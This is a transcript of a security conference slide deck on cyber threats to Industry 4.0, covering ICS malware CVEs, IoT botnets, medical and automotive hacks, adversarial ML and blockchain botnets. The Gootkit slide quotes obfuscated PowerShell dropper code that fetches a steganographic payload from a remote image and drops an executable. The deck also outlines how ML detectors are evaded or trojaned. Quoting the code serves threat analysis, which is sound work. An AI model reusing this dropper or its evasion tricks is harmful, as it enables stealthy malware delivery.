cyber threats in industry 4 - sms engineering..." to make a robot secure: an experimental...
TRANSCRIPT
Cyber Threats in Industry 4.0
Antonio Pirozzi
Presented By
Agenda
• The Cyberspace
• Industry 4.0
• Scenarios
• IoT
• The evolution of Cyber Threats: AI
• Adversarial blockchain
• Recommendations
The Cyberspace
Nowadays, we live and work in a huge virtual space that makes the concept of
frontier disappear, it takes the name of Cyberspace and is inevitably linked to the
real-life domain in which it establishes strong cause-effect relationships.
Industry 4.0 Cyber Physical Systems
•Advanced manufacturing solution
•Additive manufacturing
•Augmented reality
•Simulation
•Horizontal e vertical integration
•Industrial internet
•Cloud
•Cyber-security
•Big Data Analytics (Analytics and Predictive Analytics)
The 9 enabling technologies defined by Boston Consulting are:
Scenarios
Critical Infrastructure Cyber Threats
• Duqu2 uses a kernel mode exploit for CVE-2015-2360 to load its kernel mode
component.
• Turla uses 2 exploit for CVE-2013-5065 and CVE-2013-3346
• Stuxnet uses 4 exploit for CVE-2010-2568, CVE-2010-2729, CVE-2008-4250, CVE-
2010-2722 (American-Israeli Cyber Weapon)
• BlackEnergy uses a memory corruption vulnerability CVE-2014-1761and an RCE
vulnerability CVE-2014-4114
Siemens S7-300(spin between 807 Hz and 1210 Hz)
From “The State of Industrial Cybersecurity 2017” report by Kaspersky
Malware CVE
Stuxnet CVE-2010-2729
CVE-2010-2568
CVE-2008-4250
Triton N/A
Industroyer CVE-2015-5374
Havex (RAT) CVE-2014-1761
CVE-2013-5671
CVE-2013-1756
IronGate N/A
BlackEnergy CVE-2014-4114
CVE-2014-0751
abusing the MQTT protocols
Security experts from Trend Micro discovered that some machine-to-machine
(M2M) protocols can be abused to attack IoT and industrial Internet of Things (IIoT) systems.
From: The Fragility of Industrial IoT’s Data Backbone, TrendMicro Research
M2M Technologies
• target reconnaissance• industrial espionage• targeted attacks• to make lateral
movements.
M2M Technologies could be abused for:
From: The Fragility of Industrial IoT’s Data Backbone, TrendMicro Research
Biomedical Devices
[1] Radcliffe, Jerome. "Hacking medical devices for fun and insulin: Breaking the human SCADA
system." Black Hat US 2011
[2] Bonaci, Tamara, et al. "To make a robot secure: an experimental analysis of cyber security threats
against teleoperated surgical robots." arXiv preprint arXiv:1504.04339 (2015).
R7-2016-07.1: Communications transmitted in cleartext (CVE-2016-5084)
R7-2016-07.2: Weak pairing between remote and pump (CVE-2016-5085)
R7-2016-07.3: Lack of replay attack prevention or transmission assurance (CVE-2016-5086)
Automotive Threats
Charlie Miller and Chris Valasek originally hacked a Jeep Cherokee in 2015
IoT Botnets
• Linux.Aidra
• Bashlite
• Mirai
• Linux/IRCTelnet
Key Points
• embedded devices are easily exploited (e.g., default credentials, exposed services)
• Off-the-shelf products with low security standards (often root:root and admin:admin since few
end users change this nomenclature once deployed)
• Malware can easily change default passwords
• Devices are rarely monitored and poorly maintained
• Low cost of entry for attackers as control of thousands of devices can occur for nearly zero cost
Gootkit dropper evasion : LSB
Steganography
sal a New-Object;Add-Type -AssemblyName "System.Drawing";$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("https://i.imgur.com/FNo9S33.png")); $o=a Byte[] 500;(0..0)|%{foreach($x in(0..499)){$p=$g.GetPixel($x,$_);$o[$_*500+$x]=([math]::Floor(($p.B-band 15)*16)-bor($p.G -band 15))}};[System.Text.Encoding]::ASCII.GetString($o[0..44])
${A`Az}=&("{5}{2}{3}{1}{4}{0}"-
f'uageList','n','WinUs','erLa','g','Get-') |
&("{0}{1}{3}{2}" -f'O','ut-St','ing','r') -Stream;
if (${A`Az} -Match
"ita"){${ur`Ls}=("{5}{4}{1}{2}{0}{3}"-
f'/usbte','t','amo.us','ch','://ali','https'),"";
foreach(${u`RL} in ${UR`lS}){Try{.("{2}{0}{1}"-f '-
H','ost','write') ${U`RL};
${FP} = "$env:temp\Defrags.exe";
&("{1}{3}{2}{0}"-f 'st','W','te-Ho','ri') ${fP};
${WC} = &("{2}{3}{0}{1}"-f '-Ob','ject','Ne','w')
("{2}{3}{0}{1}“f'stem.Net.WebClie','nt','S','y');${
wC};
Payload embedded with LSB steganography
Powershell Dropper
Powershell payload obfuscated with string subst.
VT detection ratio: 0/57
Going Fileless: sLoad
Reactive
Approaches
Proactive
Approaches
Predictive
Approaches (ML, AI)
The Cyber Security Shift
“Secondo uno studio di Trend Micro, in media un'organizzazione impiega circa
230 giorni per scoprire un intrusion.”
Deep Learning and ATM
Montepaschi defends their ATMs with deep learning
According to Ossif data, the Anti-Crime Safety Research Center of the Italian Banking Association, the
number of bank robberies in the last 15 years has gone from a level 100 to 24, while attacks on ATMs
from 100 have reached 185 .
Montepaschi is developing an ATM protection system that uses the Depth Cameras (real
sensitive of Intel) and Convolutional neural network (Deep Learning) to correlate the
information coming from the sensors and thus prevent the phenomena before they occur "
AI versus AI
“This is the first year where we will see
AI versus AI in a cybersecurity context,”
Nick Savvides, CTO at Symantec
All ML models have blind spots: Adversarial examples can generalize across
models
Practical Black-Box Attacks against Machine Learning
Nicolas Papernot, Patrick McDaniel, Ian Goodfellow, Somesh Jha, Z. Berkay Celik, Ananthram Swami
Goal: Can You Break Machine Learning?
Adversarial Machine Learning: Reinforcment Learning
Hyrum Anderson , Evading next-gen AV using A.I. DEFCON 25,
Goal: Can You Break Machine Learning?
Authors describe a technique for inserting trojan code into deep learning models.
Neural level Trojan
The first known example of the use of ML for the creation of Malware is 2017:
"Generating Adversarial Malware Examples for Black-Box Attacks Based on GAN" by
Weiwei Hu, Ying Tan
MalGAN
bypass black-box machine
learning based detection
models
Hivenet
A “hivenet” is a self-learning cluster of compromised devices that share information
and customize attacks. Hivenets direct swarmbots based on what they learn during an
attack.
Adversarial Blockchain
BOTCHAIN
“BOTCHAIN is the ultimate Infrastructure to Build resilient BOTNETS upon the Blockchain”
• - Tamper-proof communications: Immune to data modifications.
• - HA: nodes doesn’t have hardcoded C2 address. C2 could be ANY WALLET
• - Zero-data-leakage: no data can be gathered by reverse engineering the bots
DEMO
Blockchain Composition Malware
The Disassembler The Assembler
Design of a blockchain-resident
composition malware: a proof of
concept. Visaggio, Pirozzi 2017
High level Recommendation
• Implement proper policies to remove unnecessary M2M services
• Run periodic checks using internet-wide scan services or tools to ensure that none
of the sensitive company data is inadvertently leaked through public IoT services
• Implement a vulnerability management workflow or other means to secure the
supply chain.
• Stay up to date with the standards in this space because this technology is evolving
rapidly.